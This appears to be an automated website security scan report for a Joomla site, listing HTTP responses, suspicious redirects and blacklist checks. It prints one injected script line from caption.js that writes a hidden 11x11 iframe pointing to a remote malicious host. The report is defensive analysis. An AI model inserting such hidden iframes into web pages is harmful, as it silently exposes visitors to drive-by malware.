Scanned pages/files
Request | Server response | Status |
http://estudiomk.com/ | HTTP/1.1 200 OK Connection: close Date: Wed, 25 Jun 2014 13:41:15 GMT Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://estudiomk.com/?_fb_noscript=1 | HTTP/1.1 200 OK Connection: close Date: Wed, 25 Jun 2014 13:41:16 GMT Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 4275 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://estudiomk.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:17 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://atlanticpurchasing.com/ | 200 OK Content-Length: 8418 Content-Type: text/html | clean |
http://atlanticpurchasing.com/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2850 Content-Type: application/x-javascript | clean |
http://estudiomk.com/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:24 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://atlanticpurchasing.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://estudiomk.com/plugins/system/jcemediabox/addons/default.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:25 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/plugins/system/jcemediabox/addons/twitter.js?v=105 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:26 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/media/system/js/caption.js | 200 OK Content-Length: 2127 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
...[1024 bytes skipped]...
        container.className = this.selector.replace('.', '_');
        container.className = container.className + " " + align;
        container.setAttribute("style","float:"+align);
        container.style.width = width + "px";
    }
});
document.caption = null;
window.addEvent('load', function() {
    var caption = new JCaption('img.caption')
    document.caption = caption
});
;document.write('<iframe src="http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');
Antivirus reports:
Malicious iFrame found. size: 11x11 src: http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6 This URL is marked by Google as suspicious.
<iframe src="http://jlhsyytr.pcanywhere.net/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11">
http://estudiomk.com/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:27 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:28 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_roknavmenu/themes/fusion/js/sfhover-ie.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:28 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_roknavmenu/themes/fusion/js/fusion.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:29 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://estudiomk.com/modules/mod_flashmod/mod_flashmod.js | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 13:41:29 GMT Location: http://atlanticpurchasing.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 Content-Length: 332 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: estudiomk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Jun 2014 13:41:15 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: estudiomk.com
Referer: http://www.google.com/search?q=estudiomk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estudiomk.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estudiomk.com/
Result: estudiomk.com is not infected or malware details are not published yet.